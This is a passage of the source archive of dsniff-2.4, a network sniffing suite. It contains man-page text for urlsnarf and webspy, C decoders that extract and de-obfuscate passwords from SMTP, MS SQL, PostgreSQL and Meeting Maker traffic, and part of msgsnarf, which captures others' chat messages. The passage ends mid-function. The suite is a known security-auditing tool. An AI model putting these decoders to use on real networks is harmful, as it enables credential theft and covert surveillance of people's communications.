[\fB-i \fIinterface\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBurlsnarf\fR outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.). .SH OPTIONS .IP \fB-n\fR Do not resolve IP addresses to hostnames. .IP "\fB-i \fIinterface\fR" .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching URLs. Specify the interface to listen on. .IP \fIpattern\fR Specify regular expression for URL matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/webspy.80000600000175000017500000000116707204257551014104 0ustar lucianoluciano.TH WEBSPY 8 .ad .fi .SH NAME webspy \- display sniffed URLs in Netscape in real-time .SH SYNOPSIS .na .nf .fi \fBwebspy\fR [\fB-i \fIinterface\fR] \fIhost\fR .SH DESCRIPTION .ad .fi \fBwebspy\fR sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). Netscape must be running on your local X display ahead of time. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fIhost\fR Specify the web client to spy on. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/decode_mmxp.c0000600000175000017500000000364407254077075015142 0ustar lucianoluciano/* * decode_mmxp.c * * Meeting Maker. * * Thanks for Matt Power for his BUGTRAQ post * on Meeting Maker encryption, and for providing me with traffic traces. * * The encryption algorithm seems to be much simpler than what Matt * reversed - see below... * * Copyright (c) 2000 Dug Song * * $Id: decode_mmxp.c,v 1.8 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "buf.h" #include "decode.h" #define MM_SECRET "Thisisastupidwasteoftimeandspace" static u_char *mm_xor = MM_SECRET; int decode_mmxp(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_char *p, c; u_int32_t i; int encrypt; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, len); while ((i = buf_index(&inbuf, "\x00\x00\x24\x55", 4)) != -1) { buf_skip(&inbuf, i + 4); if (buf_cmp(&inbuf, "\x7f\xff", 2) == 0) encrypt = 1; else if (buf_cmp(&inbuf, "\xff\xff", 2) == 0) encrypt = 0; else continue; buf_skip(&inbuf, 4); /* LPPPg? */ if (buf_get(&inbuf, &i, sizeof(i)) < 0) break; i = ntohl(i); if (buf_skip(&inbuf, i + 4 + 4) < 0) continue; /* Server. */ if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; buf_put(&outbuf, buf_ptr(&inbuf), c); buf_put(&outbuf, "\n", 1); buf_skip(&inbuf, c + 4); /* Username. */ if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; buf_put(&outbuf, buf_ptr(&inbuf), c); buf_put(&outbuf, "\n", 1); buf_skip(&inbuf, c + 4); /* Password. */ if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; p = buf_ptr(&inbuf); if (encrypt) { for (i = 0; i < c; i++) p[i] ^= mm_xor[i % (sizeof(MM_SECRET) - 1)]; } buf_put(&outbuf, p, c); buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_smtp.c0000600000175000017500000000207307254077076015140 0ustar lucianoluciano/* * decode_smtp.c * * Simple Mail Transfer Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_smtp.c,v 1.3 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "base64.h" #include "options.h" #include "decode.h" int decode_smtp(u_char *buf, int len, u_char *obuf, int olen) { char *p; int i, j, login = 0; obuf[0] = '\0'; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (login == 1) { strlcat(obuf, p, olen); i = base64_pton(p, p, strlen(p)); p[i] = '\0'; j = strlen(obuf); snprintf(obuf + j, olen - j, " [%s]\n", p); login = 0; } else if (strncmp(p, "AUTH LOGIN ", 11) == 0) { strlcat(obuf, p, olen); p += 11; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; j = strlen(obuf); snprintf(obuf + j, olen - j, " [%s]\n", p); login = 1; } else if (strncmp(p, "MAIL ", 5) == 0 || strncmp(p, "RCPT ", 5) == 0 || strncmp(p, "DATA", 4) == 0) { break; } } return (strlen(obuf)); } dsniff-2.4/tcp_raw.h0000600000175000017500000000106407254077102014303 0ustar lucianoluciano/* * tcp_raw.h * * Raw (best-effort, half-duplex) TCP reassembly. Haaacccck. * * Copyright (c) 2000 Dug Song * * $Id: tcp_raw.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef TCP_RAW_H #define TCP_RAW_H typedef void (*tcp_raw_callback_t)(in_addr_t src, in_addr_t dst, u_short sport, u_short dport, u_char *buf, int len); struct iovec *tcp_raw_input(struct libnet_ip_hdr *ip, struct libnet_tcp_hdr *tcp, int len); void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback); #endif /* TCP_RAW_H */ dsniff-2.4/dsniff.magic0000600000175000017500000000350207204257552014751 0ustar lucianoluciano# $Id: dsniff.magic,v 1.8 2000/07/19 03:22:02 dugsong Exp $ # # Network protocol magic(5) for dsniff. # 0 string FLAPON aim 0 string BEGIN\ cvs 0 string SYST ftp 0 string USER\ ftp ftp 0 string USER\ anonymous ftp 0 string HELO\ smtp 0 string EHLO\ smtp 0 string GET\ / http 0 string POST\ / http 0 string CONNECT\ http 1 string \ LOGIN\ imap 2 string \ LOGIN\ imap 3 string \ LOGIN\ imap 4 string \ LOGIN\ imap 5 string \ LOGIN\ imap 0 string NICK\ irc 0 string USER\ pop 0 string AUTH\ pop 12 string MIT-MAGIC x11 0 string LIST nntp 0 string GROUP nntp 0 string NEW nntp 0 string ARTICLE nntp 0 belong 0x7f7f4943 >4 beshort 0x4100 citrix 0 belong 0x0200e803 icq 8 belong 0x0135012c >12 belong 0x0c010800 >>16 belong 0x7fff7f08 >>>20 belong 0x00000001 oracle 0 belong 0x0 >4 byte 0x8d pcanywhere >5 byte 0x6 pcanywhere 132 belong 0x0301060a >242 belong 0 tds 32 belong 0xe0031000 >36 belong 0x2c010000 tds 12 belong 100000 >4 belong 0 >>8 belong 2 portmap 12 belong 100005 >4 belong 0 >>8 belong 2 mountd 12 belong 100009 >4 belong 0 >>8 belong 2 yppasswd 16 belong 100000 >8 belong 0 >>12 belong 2 portmap 16 belong 100005 >8 belong 0 >>12 belong 2 mountd 16 belong 100009 >8 belong 0 >>12 belong 2 yppasswd 0 belong 296 >4 belong 0x20000 postgresql 0 belong 0x81000048 >33 string CACA smb 0 beshort >0xfff9 >2 byte <40 >>3 beshort >0xfff9 >>>5 byte <40 telnet 2 leshort 2 >(0.b+6) leshort 208 napster >(0.b+6) leshort 2 napster 0 byte 0x38 >8 belong 0x00002455 mmxp 0 byte 5 >6 leshort 260 >>32 byte 0 sniffer >6 leshort 261 >>32 lelong -1 sniffer >1 belong 0 >>5 byte 0 icq >(1.b+1) byte 1 socks 0 byte&0x1f 16 >2 byte&0x1f 2 >>5 byte 0x60 ldap >4 byte&0x1f 2 >>5 beshort&0xfffc 0x0100 >>>7 byte&0x1f 4 snmp dsniff-2.4/pcaputil.h0000600000175000017500000000054007254077102014463 0ustar lucianoluciano/* * pcaputil.h * * pcap utility routines. * * Copyright (c) 2000 Dug Song * * $Id: pcaputil.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef PCAPUTIL_H #define PCAPUTIL_H pcap_t *pcap_init(char *intf, char *filter, int snaplen); int pcap_dloff(pcap_t *pd); char *copy_argv(char **argv); #endif /* PCAPUTIL_H */ dsniff-2.4/decode_tds.c0000600000175000017500000001001707254077076014744 0ustar lucianoluciano/* * decode_tds.c * * Tabular Data Stream (Sybase, Microsoft SQL). See www.freetds.org. * * Thanks to antilove!@#$% and Ben Lowery for * providing me with packet traces. * * Copyright (c) 2000 Dug Song * Copyright (c) 2001 Paul van Maaren * * $Id: decode_tds.c,v 1.10 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" struct tds_hdr { u_char type; u_char last; u_short size; u_int32_t zero; }; struct tds_login { char hostname[30]; u_char hostlen; char username[30]; u_char userlen; char password[30]; u_char passlen; char process[30]; u_char proclen; char magic1[6]; u_char bulkcopy; char magic2[9]; char appname[30]; u_char applen; char servername[30]; u_char serverlen; u_char zero; u_char pass2len; char password2[30]; char magic3[223]; u_char pass2len2; char version[4]; char libname[10]; u_char liblen; char magic4[3]; char language[30]; u_char langlen; u_char nolang; u_short magic5; u_char encrypted; char magic6[10]; char charset[30]; u_char charlen; u_char magic7; char blocksize[6]; u_char blocklen; char magic8[4]; /* 4.2: 8, 4.6: 4, 5.0: 25 */ }; u_char tds7_magic1[] = { 0x6, 0x83, 0xf2, 0xf8, 0xff, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x03, 0x0, 0x0, 0x88, 0xff, 0xff, 0xff, 0x36, 0x04, 0x00, 0x00 }; struct tds7_login { u_short size; char zero1[5]; u_char byte1; /* 0x70 */ char zero2[7]; char magic1[21]; u_short servpos; u_short servlen; u_short userpos; /* XXX - freetds got this wrong? */ u_short userlen; u_short passpos; u_short passlen; u_short somepos; u_short somelen; u_short apppos; u_short applen; char zero4[4]; u_short libpos; u_short liblen; char skip1[8]; char magic2[6]; char skip2[8]; /* char servername[servlen]; */ /* char username[userlen]; */ /* char password[passlen]; */ /* char appname[applen]; */ /* char server[servlen]; */ /* char library[liblen]; */ /* char magic3[48]; */ }; static void deunicode(u_char *buf, int len) { int i; for (i = 0; i < len; i++) { buf[i] = buf[i * 2]; } buf[i] = '\0'; } static void tds7_decrypt(u_char *buf, int len) { int i; for (i = 0; i < len; i++) { buf[i] = ((buf[i] << 4) | (buf[i] >> 4)) ^ 0x5a; } buf[i] = '\0'; } int decode_tds(u_char *buf, int len, u_char *obuf, int olen) { struct tds_hdr *th; struct tds_login *tl; struct tds7_login *t7l, *myt7l; u_char *user, *pass, *serv; u_short userlen, passlen, servlen; obuf[0] = '\0'; for (th = (struct tds_hdr *)buf; len > sizeof(*th) && len >= ntohs(th->size); buf += ntohs(th->size), len -= ntohs(th->size)) { if (th->type == 2) { /* Version 4.x, 5.0 */ if (len < sizeof(*th) + sizeof(*tl)) return (0); tl = (struct tds_login *)(th + 1); if (tl->userlen > sizeof(tl->username)) return (0); tl->username[tl->userlen] = '\0'; strlcat(obuf, tl->username, olen); strlcat(obuf, "\n", olen); if (tl->passlen > sizeof(tl->password)) return (0); tl->password[tl->passlen] = '\0'; strlcat(obuf, tl->password, olen); strlcat(obuf, "\n", olen); } else if (th->type == 16 && th->last == 1) { /* Version 7.0 */ if (len < sizeof(*th) + sizeof(*t7l)) return (0); t7l = (struct tds7_login *)(th + 1); myt7l = (struct tds7_login *)(buf + sizeof(*th)); userlen = pletohs(&t7l->userlen); passlen = pletohs(&t7l->passlen); servlen = pletohs(&t7l->servlen); if (len < sizeof(*th) + sizeof(*t7l) + (2 * (userlen + passlen))) { return (0); } serv = (u_char *)(t7l + 1); deunicode(serv, servlen); user = serv + (2 * servlen); pass = user + (2 * userlen); deunicode(user, userlen); /* XXX - when to call? */ tds7_decrypt(pass, 2 * passlen); deunicode(pass, passlen); snprintf(obuf + strlen(obuf), olen - strlen(obuf), "%s\n%s\n", user, pass); return(strlen(obuf)); } } return (strlen(obuf)); } dsniff-2.4/nfs_prot.x0000600000175000017500000001641207204257552014525 0ustar lucianoluciano/* minimal spec for filesnarf. */ /* * Copyright (c) 1987, 1997 by Sun Microsystems, Inc. * All rights reserved. */ /* #pragma ident "@(#)nfs_prot.x 1.5 97/06/21 SMI" */ %#include "config.h" const NFS_PORT = 2049; const NFS_MAXDATA = 8192; const NFS_MAXPATHLEN = 1024; const NFS_MAXNAMLEN = 255; const NFS_FHSIZE = 32; const NFS_COOKIESIZE = 4; const NFS_FIFO_DEV = -1; /* size kludge for named pipes */ /* * File types */ const NFSMODE_FMT = 0170000; /* type of file */ const NFSMODE_DIR = 0040000; /* directory */ const NFSMODE_CHR = 0020000; /* character special */ const NFSMODE_BLK = 0060000; /* block special */ const NFSMODE_REG = 0100000; /* regular */ const NFSMODE_LNK = 0120000; /* symbolic link */ const NFSMODE_SOCK = 0140000; /* socket */ const NFSMODE_FIFO = 0010000; /* fifo */ /* * Error status */ enum nfsstat { NFS_OK= 0, /* no error */ NFSERR_PERM=1, /* Not owner */ NFSERR_NOENT=2, /* No such file or directory */ NFSERR_IO=5, /* I/O error */ NFSERR_NXIO=6, /* No such device or address */ NFSERR_ACCES=13, /* Permission denied */ NFSERR_EXIST=17, /* File exists */ NFSERR_XDEV=18, /* Cross-device link */ NFSERR_NODEV=19, /* No such device */ NFSERR_NOTDIR=20, /* Not a directory*/ NFSERR_ISDIR=21, /* Is a directory */ NFSERR_INVAL=22, /* Invalid argument */ NFSERR_FBIG=27, /* File too large */ NFSERR_NOSPC=28, /* No space left on device */ NFSERR_ROFS=30, /* Read-only file system */ NFSERR_OPNOTSUPP=45, /* Operation not supported */ NFSERR_NAMETOOLONG=63, /* File name too long */ NFSERR_NOTEMPTY=66, /* Directory not empty */ NFSERR_DQUOT=69, /* Disc quota exceeded */ NFSERR_STALE=70, /* Stale NFS file handle */ NFSERR_REMOTE=71, /* Object is remote */ NFSERR_WFLUSH=72 /* write cache flushed */ }; /* * File types */ enum ftype { NFNON = 0, /* non-file */ NFREG = 1, /* regular file */ NFDIR = 2, /* directory */ NFBLK = 3, /* block special */ NFCHR = 4, /* character special */ NFLNK = 5, /* symbolic link */ NFSOCK = 6, /* unix domain sockets */ NFBAD = 7, /* unused */ NFFIFO = 8 /* named pipe */ }; /* * File access handle */ struct nfs_fh { opaque data[NFS_FHSIZE]; }; /* * Timeval */ struct nfstime { unsigned seconds; unsigned useconds; }; /* * File attributes */ struct fattr { ftype type; /* file type */ unsigned mode; /* protection mode bits */ unsigned nlink; /* # hard links */ unsigned uid; /* owner user id */ unsigned gid; /* owner group id */ unsigned size; /* file size in bytes */ unsigned blocksize; /* prefered block size */ unsigned rdev; /* special device # */ unsigned blocks; /* Kb of disk used by file */ unsigned fsid; /* device # */ unsigned fileid; /* inode # */ nfstime atime; /* time of last access */ nfstime mtime; /* time of last modification */ nfstime ctime; /* time of last change */ }; typedef string filename; typedef string nfspath; /* * Arguments for directory operations */ struct diropargs { nfs_fh dir; /* directory file handle */ filename name; /* name (up to NFS_MAXNAMLEN bytes) */ }; struct diropokres { nfs_fh file; fattr attributes; }; /* * Results from directory operation */ union diropres switch (nfsstat status) { case NFS_OK: diropokres diropres; default: void; }; /* * Arguments to remote read */ struct readargs { nfs_fh file; /* handle for file */ unsigned offset; /* byte offset in file */ unsigned count; /* immediate read count */ unsigned totalcount; /* total read count (from this offset)*/ }; /* * Status OK portion of remote read reply */ struct readokres { fattr attributes; /* attributes, need for pagin*/ opaque data; }; union readres switch (nfsstat status) { case NFS_OK: readokres reply; default: void; }; /* * Remote file service routines */ program NFS_PROGRAM { version NFS_VERSION { void NFSPROC_NULL(void) = 0; diropres NFSPROC_LOOKUP(diropargs) = 4; readres NFSPROC_READ(readargs) = 6; } = 2; } = 100003; /* * Version 3 declarations and definitions. */ /* * Sizes */ const NFS3_FHSIZE = 64; const NFS3_COOKIEVERFSIZE = 8; const NFS3_CREATEVERFSIZE = 8; const NFS3_WRITEVERFSIZE = 8; /* * Basic data types */ typedef u_int64_t uint64; typedef int64_t int64; typedef unsigned int uint32; typedef int int32; typedef string filename3<>; typedef string nfspath3<>; typedef uint64 fileid3; typedef uint64 cookie3; typedef opaque cookieverf3[NFS3_COOKIEVERFSIZE]; typedef opaque createverf3[NFS3_CREATEVERFSIZE]; typedef opaque writeverf3[NFS3_WRITEVERFSIZE]; typedef uint32 uid3; typedef uint32 gid3; typedef uint64 size3; typedef uint64 offset3; typedef uint32 mode3; typedef uint32 count3; /* * Error status */ enum nfsstat3 { NFS3_OK = 0, NFS3ERR_PERM = 1, NFS3ERR_NOENT = 2, NFS3ERR_IO = 5, NFS3ERR_NXIO = 6, NFS3ERR_ACCES = 13, NFS3ERR_EXIST = 17, NFS3ERR_XDEV = 18, NFS3ERR_NODEV = 19, NFS3ERR_NOTDIR = 20, NFS3ERR_ISDIR = 21, NFS3ERR_INVAL = 22, NFS3ERR_FBIG = 27, NFS3ERR_NOSPC = 28, NFS3ERR_ROFS = 30, NFS3ERR_MLINK = 31, NFS3ERR_NAMETOOLONG = 63, NFS3ERR_NOTEMPTY = 66, NFS3ERR_DQUOT = 69, NFS3ERR_STALE = 70, NFS3ERR_REMOTE = 71, NFS3ERR_BADHANDLE = 10001, NFS3ERR_NOT_SYNC = 10002, NFS3ERR_BAD_COOKIE = 10003, NFS3ERR_NOTSUPP = 10004, NFS3ERR_TOOSMALL = 10005, NFS3ERR_SERVERFAULT = 10006, NFS3ERR_BADTYPE = 10007, NFS3ERR_JUKEBOX = 10008 }; /* * File types */ enum ftype3 { NF3REG = 1, NF3DIR = 2, NF3BLK = 3, NF3CHR = 4, NF3LNK = 5, NF3SOCK = 6, NF3FIFO = 7 }; struct specdata3 { uint32 specdata1; uint32 specdata2; }; /* * File access handle */ struct nfs_fh3 { opaque data; }; /* * Timeval */ struct nfstime3 { uint32 seconds; uint32 nseconds; }; /* * File attributes */ struct fattr3 { ftype3 type; mode3 mode; uint32 nlink; uid3 uid; gid3 gid; size3 size; size3 used; specdata3 rdev; uint64 fsid; fileid3 fileid; nfstime3 atime; nfstime3 mtime; nfstime3 ctime; }; /* * File attributes */ union post_op_attr switch (bool attributes_follow) { case TRUE: fattr3 attributes; case FALSE: void; }; struct wcc_attr { size3 size; nfstime3 mtime; nfstime3 ctime; }; union pre_op_attr switch (bool attributes_follow) { case TRUE: wcc_attr attributes; case FALSE: void; }; struct wcc_data { pre_op_attr before; post_op_attr after; }; struct diropargs3 { nfs_fh3 dir; filename3 name; }; /* * LOOKUP: Lookup filename */ struct LOOKUP3args { diropargs3 what; }; struct LOOKUP3resok { nfs_fh3 object; post_op_attr obj_attributes; post_op_attr dir_attributes; }; struct LOOKUP3resfail { post_op_attr dir_attributes; }; union LOOKUP3res switch (nfsstat3 status) { case NFS3_OK: LOOKUP3resok resok; default: LOOKUP3resfail resfail; }; /* * READ: Read from file */ struct READ3args { nfs_fh3 file; offset3 offset; count3 count; }; struct READ3resok { post_op_attr file_attributes; count3 count; bool eof; opaque data<>; }; struct READ3resfail { post_op_attr file_attributes; }; union READ3res switch (nfsstat status) { case NFS3_OK: READ3resok resok; default: READ3resfail resfail; }; /* * Remote file service routines */ program NFS3_PROGRAM { version NFS_V3 { void NFSPROC3_NULL(void) = 0; LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args) = 3; READ3res NFSPROC3_READ(READ3args) = 6; } = 3; } = 100003; dsniff-2.4/dsniff.services0000600000175000017500000000212607216475322015515 0ustar lucianoluciano# $Id: dsniff.services,v 1.8 2000/12/15 20:10:58 dugsong Exp $ # # Network services, dsniff style # ftp 21/tcp telnet 23/tcp smtp 25/tcp pptp 47/ip http 80/tcp ospf 89/ip http 98/tcp poppass 106/tcp pop 109/tcp pop 110/tcp portmap 111/tcp portmap -111/tcp portmap 111/udp portmap -111/udp vrrp 112/ip nntp 119/tcp smb 139/tcp imap 143/tcp snmp 161/udp imap 220/tcp telnet 261/tcp ldap 389/tcp mmxp 417/tcp mmxp 417/udp rlogin 512/tcp rlogin 513/tcp rlogin 514/tcp rip 520/udp smtp 587/tcp socks 1080/tcp tds 1433/tcp tds 1433/udp citrix 1494/tcp oracle 1521/tcp oracle 1526/tcp sniffer 2001/udp cvs 2401/tcp mmxp 2417/tcp mmxp 2417/udp tds 2638/tcp http 3128/tcp icq 4000/udp napster 4444/tcp aim 5190/tcp postgresql 5432/tcp napster 5555/tcp pcanywhere 5631/tcp x11 6000/tcp x11 6001/tcp x11 6002/tcp x11 6003/tcp x11 6004/tcp x11 6005/tcp napster 6666/tcp irc 6667/tcp irc 6668/tcp irc 6669/tcp tds 7599/tcp napster 7777/tcp http 8080/tcp napster 8888/tcp aim 9898/tcp pcanywhere 65301/tcp mountd 100005/rpc ypserv 100004/rpc yppasswd 100009/rpc dsniff-2.4/decode_postgresql.c0000600000175000017500000000205107254077076016354 0ustar lucianoluciano/* * decode_postgresql.c * * PostgreSQL. * * Thanks to Eric Jackson for packet traces. * * Copyright (c) 2000 Dug Song * * $Id: decode_postgresql.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" #define STARTUP_PKTLEN 296 int decode_postgresql(u_char *buf, int len, u_char *obuf, int olen) { u_int32_t plen; u_char *p; char *db, *user; if (len < STARTUP_PKTLEN) return (0); obuf[0] = '\0'; db = user = NULL; for (;;) { if (len < 4) break; plen = pntohl(buf); if (plen > len) break; p = buf + 4; if (plen == STARTUP_PKTLEN) { if (pntohl(p) >> 16 == 2) { db = p + 4; db[63] = '\0'; user = db + 64; user[31] = '\0'; } } else if (db != NULL && user != NULL) { buf[plen - 1] = '\0'; snprintf(obuf + strlen(obuf), olen - strlen(obuf), "%s\n%s\n%s\n", db, user, p); db = user = NULL; } buf += plen; len -= plen; } return (strlen(obuf)); } dsniff-2.4/buf.c0000600000175000017500000000744507254077073013433 0ustar lucianoluciano/* * buf.c * * Copyright (c) 2000 Dug Song * * $Id: buf.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "buf.h" void buf_init(buf_t buf, u_char *data, int len) { buf->base = data; buf->end = buf->size = len; buf->offset = 0; } buf_t buf_new(int size) { buf_t buf; if ((buf = malloc(sizeof(*buf))) == NULL) return (NULL); if ((buf->base = malloc(size)) == NULL) { free(buf); return (NULL); } buf->size = size; buf->offset = 0; buf->end = 0; return (buf); } void buf_free(buf_t buf) { if (buf->base != NULL) { free(buf->base); } free(buf); } int buf_seek(buf_t buf, int off, int whence) { if ((whence == SEEK_SET) && (off <= buf->size)) { buf->offset = off; } else if ((whence == SEEK_CUR) && ((buf->offset + off) <= buf->size)) { buf->offset += off; } else return (-1); return (buf->offset); } int buf_get(buf_t buf, void *dst, int len) { u_char *p; int i; p = dst; if (buf_len(buf) < len) { return (-1); } for (i = 0; i < len; i++) p[i] = buf->base[buf->offset + i]; buf->offset += len; return (len); } int buf_put(buf_t buf, void *src, int len) { if (buf->offset + len > buf->size) { return (-1); } memcpy(buf_ptr(buf), src, len); buf->offset += len; return (len); } int buf_putf(buf_t buf, const char *fmt, ...) { va_list ap; int i; va_start(ap, fmt); i = vsnprintf(buf_ptr(buf), buf_len(buf), fmt, ap); va_end(ap); buf_skip(buf, i); return (i); } void buf_end(buf_t buf) { buf->end = buf->offset; buf->offset = 0; } int buf_index(buf_t buf, void *ptr, int len) { u_char *p, *q; p = buf_ptr(buf); q = buf->base + buf->end; for (; q - p >= len; p++) { if (memcmp(p, ptr, len) == 0) return (p - buf_ptr(buf)); } return (-1); } int buf_rindex(buf_t buf, void *ptr, int len) { u_char *p, *q; p = buf->base + buf->end - len; q = buf_ptr(buf); for (; p > q; p--) { if (memcmp(p, ptr, len) == 0) return (p - q); } return (-1); } int buf_cmp(buf_t buf, void *ptr, int len) { if (buf_len(buf) < len) return (-1); return (memcmp(buf_ptr(buf), ptr, len)); } buf_t buf_tok(buf_t buf, void *sep, int len) { static struct buf *savebuf, tokbuf; int off; if (buf != NULL) savebuf = buf; if (sep == NULL && buf_len(savebuf) >= len) { tokbuf.base = buf_ptr(savebuf); tokbuf.offset = 0; tokbuf.size = tokbuf.end = len; buf_skip(savebuf, len); } else if ((off = buf_index(savebuf, sep, len)) != -1) { tokbuf.base = buf_ptr(savebuf); tokbuf.offset = 0; tokbuf.size = tokbuf.end = off; buf_skip(savebuf, off + len); } else if (buf_len(savebuf) > 0) { tokbuf.base = buf_ptr(savebuf); tokbuf.offset = 0; tokbuf.size = tokbuf.end = buf_len(savebuf); savebuf->offset = savebuf->end; } else return (NULL); return (&tokbuf); } buf_t buf_getbuf(buf_t buf, int offset, int len) { buf_t b; if (buf->offset + offset + len > buf->end) return (NULL); buf_skip(buf, offset); if ((b = buf_new(len)) != NULL) { buf_put(b, buf_ptr(buf), len); buf_end(b); } buf_skip(buf, len); return (b); } buf_t buf_getword(buf_t buf, void *sep, int len) { buf_t b; int off; if ((off = buf_index(buf, sep, len)) < 0) return (NULL); if ((b = buf_new(off)) != NULL) { buf_put(b, buf_ptr(buf), off); buf_end(b); buf_skip(buf, off + len); } return (b); } char * buf_strdup(buf_t buf) { char *p; int i; i = buf_len(buf); if ((p = malloc(i + 1)) == NULL) err(1, "malloc"); memcpy(p, buf_ptr(buf), i); p[i] = '\0'; return (p); } int buf_isascii(buf_t buf) { u_char *p, *q; p = buf_ptr(buf); q = buf->base + buf->end; for (; p < q; p++) if (!isascii(*p)) return (0); return (1); } dsniff-2.4/msgsnarf.c0000600000175000017500000003505307254077100014462 0ustar lucianoluciano/* * msgsnarf.c * * Sniff chat messages (AIM, ICQ, IRC, MSN, Yahoo) on a network. * * Copyright (c) 1999 Dug Song * * $Id: msgsnarf.c,v 1.11 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include "buf.h" #include "decode.h" #include "version.h" struct client_info { char *nick; char *peer; char *type; in_addr_t ip; SLIST_ENTRY(client_info) next; }; SLIST_HEAD(, client_info) client_list; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: msgsnarf [-i interface] [[-v] pattern [expression]]\n"); exit(1); } static char * timestamp(void) { static char stamp[32]; struct tm *tm; time_t now; time(&now); tm = localtime(&now); strftime(stamp, sizeof(stamp), "%b %e %T", tm); return (stamp); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } struct flap { u_char start; u_char channel; u_short seqnum; u_short datalen; }; struct snac { u_short family; u_short subtype; u_short flags; u_int32_t reqid; }; static int process_aim(struct client_info *info, u_char *data, int len) { struct buf *msg, *word, buf; struct flap *flap; struct snac *snac; u_char c, *p; int i, reply; buf_init(&buf, data, len); if (buf_cmp(&buf, "FLAPON\r\n\r\n", 10) == 0) buf_skip(&buf, 10); while (buf_len(&buf) > sizeof(*flap)) { flap = (struct flap *)buf_ptr(&buf); flap->datalen = ntohs(flap->datalen); i = sizeof(*flap) + flap->datalen; if ((msg = buf_tok(&buf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*flap)); snac = (struct snac *)buf_ptr(msg); if (flap->start != 0x2a) continue; if (flap->channel == 0x01) { if (buf_cmp(msg, "\x00\x00\x00\x01\x00\x01\x00", 7) == 0) { buf_skip(msg, 7); buf_get(msg, &c, 1); if ((word = buf_getbuf(msg, 0, c)) != NULL) { if (info->nick) free(info->nick); info->nick = buf_strdup(word); buf_free(word); } buf_skip(msg, 3); buf_get(msg, &c, 1); buf_skip(msg, c + 4); if (buf_cmp(msg, "ICQ", 3) == 0) info->type = "ICQ"; else info->type = "AIM"; } } else if (flap->channel == 0x02) { if (buf_cmp(msg, "toc_send_im ", 12) == 0) { buf_skip(msg, 12); if ((word = buf_getword(msg, " ", 1)) == NULL) continue; buf_skip(msg, 1); if (buf_len(msg) < 3) continue; msg->end -= 2; p = buf_strdup(msg); if (regex_match(p)) printf("%s AIM %s > %.*s: %s\n", timestamp(), info->nick, buf_len(word), buf_ptr(word), p); buf_free(word); free(p); } else if (buf_cmp(msg, "IM_IN:", 6) == 0) { buf_skip(msg, 6); if ((word = buf_getword(msg, ":", 1)) == NULL) continue; buf_skip(msg, 2); p = buf_strdup(msg); if (regex_match(p)) printf("%s AIM %.*s > %s: %s\n", timestamp(), buf_len(word), buf_ptr(word), info->nick, p); buf_free(word); free(p); } else if (ntohs(snac->family) == 0x04) { if (ntohs(snac->subtype) == 0x06) reply = 0; else if (ntohs(snac->subtype) == 0x07) reply = 1; else continue; buf_skip(msg, sizeof(*snac) + 8); buf_get(msg, &c, 1); if ((word = buf_getbuf(msg, 0, c)) == NULL) continue; /* XXX - ugh, this is totally bogus. help! */ if (buf_cmp(msg, "\x00\x02", 2) == 0) { buf_skip(msg, 17); while (buf_cmp(msg, "\x00", 1) == 0) buf_skip(msg, 1); } else if (buf_cmp(msg, "\x00\x05", 2) == 0) { buf_skip(msg, 97); } else if (buf_cmp(msg, "\x00\x00", 2) == 0) { if (buf_skip(msg, 145) < 0) buf_skip(msg, 57); } p = buf_strdup(msg); if (p && strlen(p) && regex_match(p)) { if (reply) { printf("%s %s %.*s > %s: %s\n", timestamp(), info->type, buf_len(word), buf_ptr(word), info->nick, p); } else printf("%s %s %s > %.*s: %s\n", timestamp(), info->type, info->nick, buf_len(word), buf_ptr(word), p); } buf_free(word); if (p) free(p); } } } return (len - buf_len(&buf)); } static int process_irc(struct client_info *info, u_char *data, int len) { struct buf *line, *word, *prefix, buf; char *p; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\n", 1)) >= 0) { line = buf_tok(&buf, NULL, i); buf_skip(&buf, 1); if (line->base[line->end-1] == '\r') line->end--; if (buf_cmp(line, ":", 1) == 0) { buf_skip(line, 1); if ((prefix = buf_getword(line, " ", 1)) == NULL) continue; if ((i = buf_index(prefix, "!", 1)) < 0) continue; prefix->end = i; } else prefix = NULL; if (buf_cmp(line, "JOIN ", 5) == 0 && prefix != NULL) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) 